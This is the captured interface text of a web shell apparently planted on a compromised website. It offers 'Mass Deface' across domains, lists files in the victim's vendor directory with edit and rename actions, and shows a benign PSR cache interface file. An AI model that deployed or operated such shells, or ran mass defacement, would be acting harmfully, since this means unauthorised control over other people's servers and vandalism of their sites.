webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
psr
/
cache
/
src
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
CacheException.php
0.158KB
edt
ren
CacheItemInterface.php
3.771KB
edt
ren
CacheItemPoolInterface.php
4.366KB
edt
ren
InvalidArgumentExceptio
...
0.292KB
edt
ren
<?php namespace Psr\Cache; /** * Exception interface for invalid cache arguments. * * Any time an invalid argument is passed into a method it must throw an * exception class which implements Psr\Cache\InvalidArgumentException. */ interface InvalidArgumentException extends CacheException { }